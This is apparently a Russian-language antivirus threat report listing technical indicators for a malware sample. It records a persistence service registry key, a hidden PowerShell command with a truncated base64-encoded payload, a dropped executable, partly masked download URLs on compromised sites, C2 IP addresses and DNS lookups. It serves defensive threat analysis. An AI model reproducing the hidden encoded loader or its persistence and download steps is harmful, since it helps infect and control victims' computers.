Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\mspmanual] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\mspmanual] 'ImagePath' = '"%WINDIR%\SysWOW64\mspmanual.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAGUAbgBxAG8AagBtAHgAPQAnAE0AbQB5AGMAegB2AHoAbgBjACcAOwAkAFkAbQBoAHYAcAB5AHIAcABzAG8AdgB5AG8AIAA9ACAAJwA0ADQAOQAnADsAJABMAG8AbwB3AGUAYwB0AGUAPQAnAEcAbABiAHAAbgB4AHUAbwBtAHAAbwB...
- %HOMEPATH%\449.exe
- %HOMEPATH%\449.exe
- %HOMEPATH%\449.exe в %WINDIR%\syswow64\mspmanual.exe
- %HOMEPATH%\449.exe
- http://th###oilap.vn/wp-content/EV/
- http://pi####.ulm.ac.id/wp-content/r4iio/
- http://pi####.ulm.ac.id/cgi-sys/suspendedpage.cgi
- http://16#.#27.220.53/wp-includes/YEQ4r/
- http://81.#7.92.70/XBOYBnWcpgx
- http://37.###.72.193:8080/gTBzcf1Q via 37.##7.72.193
- DNS ASK hg###ghting.com
- DNS ASK th###oilap.vn
- DNS ASK pi####.ulm.ac.id
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAGUAbgBxAG8AagBtAHgAPQAnAE0AbQB5AGMAegB2AHoAbgBjACcAOwAkAFkAbQBoAHYAcAB5AHIAcABzAG8AdgB5AG8AIAA9ACAAJwA0ADQAOQAnADsAJABMAG8AbwB3AGUAYwB0AGUAPQAnAEcAbABiAHAAbgB4AHUAbwBtAHAAbwB...' (со скрытым окном)